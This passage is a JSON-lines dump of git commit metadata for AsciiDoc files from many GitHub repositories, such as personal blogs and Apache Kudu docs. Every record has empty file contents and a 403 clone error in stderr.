'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cbdf2a55bf66d4d3aa0e08ab362d02669213e2b","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 
2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b23a524eee95a3f3bd166e4b01c707c0492bb44","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"Acidburn0zzz\/winreg-kb,libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Registry files.asciidoc","new_file":"documentation\/Registry files.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"460c879548a126a37836aad5891cd3b3c8b6b4a2","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f95ac4ff280757e78bfdd7e72ad47c248c480a0d","subject":"Update 2016-03-12-Cutting-the-Strings.adoc","message":"Update 2016-03-12-Cutting-the-Strings.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Cutting-the-Strings.adoc","new_file":"_posts\/2016-03-12-Cutting-the-Strings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06e396cba6a0bcad92a150c63d4a9529297d7fa1","subject":"Update 2016-05-23-Models-are-pointers.adoc","message":"Update 2016-05-23-Models-are-pointers.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"367db74430f5e49e554d3d4a3582b3f315fc380a","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3788d818fc4303c55d2b7ac94bf6358fca05c29","subject":"Added link to forum topic for lemur","message":"Added link to forum topic for lemur\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/gui\/topic_contributions.adoc","new_file":"docs\/modules\/contributions\/pages\/gui\/topic_contributions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"255faf60c5a13eed5317a09a3c7f13eef3edb396","subject":"Update 2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","message":"Update 2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","new_file":"_posts\/2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ee6b24e289e179a3c3d4197f3198df53193576d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"111f97839b11564b69e19080cc33daf2d4d77a52","subject":"Update and rename news to news\/2015-03-04-forge-2.15.0.final.asciidoc","message":"Update and rename news to news\/2015-03-04-forge-2.15.0.final.asciidoc","repos":"luiz158\/docs,forge\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/2015-03-04-forge-2.15.0.final.asciidoc","new_file":"news\/2015-03-04-forge-2.15.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f73e334362283ca62f52d7fe852645b3edb8fdd9","subject":"Update 2016-08-29-My-First-post-on-hubpressio.adoc","message":"Update 2016-08-29-My-First-post-on-hubpressio.adoc","repos":"ErJ101\/hbspractise,ErJ101\/hbspractise,ErJ101\/hbspractise,ErJ101\/hbspractise","old_file":"_posts\/2016-08-29-My-First-post-on-hubpressio.adoc","new_file":"_posts\/2016-08-29-My-First-post-on-hubpressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ErJ101\/hbspractise.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"708fb29879e5f1e6db8398f4c439061f26f31639","subject":"y2b 
create post Crazy iPhone 7 Lighter Case","message":"y2b create post Crazy iPhone 7 Lighter Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-26-Crazy-iPhone-7-Lighter-Case.adoc","new_file":"_posts\/2016-11-26-Crazy-iPhone-7-Lighter-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9841ff1708ed78f89e71c5d4108d3e0fa9fbce4a","subject":"Renamed '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc' to '_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc'","message":"Renamed '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc' to '_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc","new_file":"_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b095075de3d27028a1ab0846af490de6cbf2b5b1","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27590397973a785094bdcc1e7fb4df72b88f1394","subject":"a workaround to HAWKULAR-508","message":"a workaround to HAWKULAR-508\n","repos":"tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d8e58156de821c28ff244fcaa8931ee10c138ae","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e05cc6ac2b5f1ef8e75c2d2546668a32ab6d8dcc","subject":"remove regular file","message":"remove regular file\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4bc603ab21f2cd059d07e71d7a8eb1fddf221db8","subject":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","message":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25e9a0f7698d929b8d478f63033748fbb3813d04","subject":"Add 2017-03-09-forge-2.6.0.final.asciidoc","message":"Add 2017-03-09-forge-2.6.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-03-09-forge-2.6.0.final.asciidoc","new_file":"news\/2017-03-09-forge-2.6.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bdb95328a833a5720b6d24cdb464a9c586c0d851","subject":"Update 2015-02-19-Hello-World.adoc","message":"Update 2015-02-19-Hello-World.adoc","repos":"ron194\/ron194.github.io,ron194\/ron194.github.io,ron194\/ron194.github.io","old_file":"_posts\/2015-02-19-Hello-World.adoc","new_file":"_posts\/2015-02-19-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ron194\/ron194.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5fd8a00b7caba189f438cda81a17eeeb2c975a2","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 
2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f89fb9db93f8195cd36fe882e3c87186f69b960","subject":"Delete 2016-02-26-Gantt-Style.adoc","message":"Delete 2016-02-26-Gantt-Style.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e64b6e7832b56ecca93188eaf7894f567e9387ea","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69e71c2c69416a8371e8f85b6585fabec6de3668","subject":"Update 2019-11-03-Kisa-Kisa-3.adoc","message":"Update 2019-11-03-Kisa-Kisa-3.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2019-11-03-Kisa-Kisa-3.adoc","new_file":"_posts\/2019-11-03-Kisa-Kisa-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20ecbd3c33bd3388d1ea8f669ebb2bcd6de78670","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd170c8c39736f245c7cdf743ccee1836711bfeb","subject":"Update 2015-5-10-uGUI.adoc","message":"Update 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uGUI.adoc","new_file":"_posts\/2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1cb687697d92d284c1ed899374e73970ceccbd1d","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"105a70889285fa93c14db7414f7fabf1425730bb","subject":"Draft STO testing document","message":"Draft STO testing document\n\n* Link to Marv\u2019s Google Doc spreadsheet\n* Link to proof-of-concept test Specs\n","repos":"OmniLayer\/OmniJ,dexX7\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ,dexX7\/bitcoin-spock,dexX7\/bitcoin-spock,dexX7\/OmniJ","old_file":"adoc\/omni-sto-testing.adoc","new_file":"adoc\/omni-sto-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8398ab1c567b405ab59ca6b9ca493ad10ca145a","subject":"Update 2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","message":"Update 2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","new_file":"_posts\/2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0e693e8373cb025d0c544b74a35d65e094c5191","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e28470049223c889f7b04bc7f5372e22ca5727a5","subject":"Update 2017-02-15-Content-views-and-composite-content-views.adoc","message":"Update 2017-02-15-Content-views-and-composite-content-views.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-02-15-Content-views-and-composite-content-views.adoc","new_file":"_posts\/2017-02-15-Content-views-and-composite-content-views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4dbab184ed500e4fbf9609772c2c5acdc2fab5b","subject":"Update 2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","message":"Update 
2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","new_file":"_posts\/2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"990e6dbefef9d56acaa87c9af96b09adda654a11","subject":"update doc","message":"update doc\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16fb7dd163c99a0910798c2b72ba2b0c91b2acff","subject":"Initial version for ha doc","message":"Initial version for ha doc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/ha.adoc","new_file":"userguide\/tutorials\/ha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79b80e10457f0b7eda08c2ac27c576f95aa0f7b6","subject":"y2b create post iPod Touch White Unboxing (4G)","message":"y2b create post iPod Touch White Unboxing (4G)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-12-iPod-Touch-White-Unboxing-4G.adoc","new_file":"_posts\/2011-10-12-iPod-Touch-White-Unboxing-4G.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35d07e9fea0d22880dd30a6588da991887a6c95d","subject":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","message":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68bb2140930050df47c13a453b9bb7682bec0b0b","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df6b5d5de8e30fd721102165ca87068b69c02969","subject":"y2b create post Google Pixel First Look 
Live","message":"y2b create post Google Pixel First Look Live","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-04-Google-Pixel-First-Look-Live.adoc","new_file":"_posts\/2016-10-04-Google-Pixel-First-Look-Live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"889d5927cc9f5e2fbdbec9e535605404ba1fc19d","subject":"[docs] Add remaining release notes for 1.7.0","message":"[docs] Add remaining release notes for 1.7.0\n\nChange-Id: I1718a2065663245a5bc438288013871566d6941b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9685\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Hao Hao <99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8aac582158af6d5cce981613ff3a83da0af8b82","subject":"Update 2015-10-29-This-is-my-first-post.adoc","message":"Update 2015-10-29-This-is-my-first-post.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5600027ab0100fcb8d3d95bd4c5810f0c810d4e","subject":"Document advice about max columns and record size","message":"Document advice about max columns and record size\n\nChange-Id: I70a82d59c431f69246128acc19227af3194fa15a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2778\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert 
<2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/schema_design.adoc","new_file":"docs\/schema_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 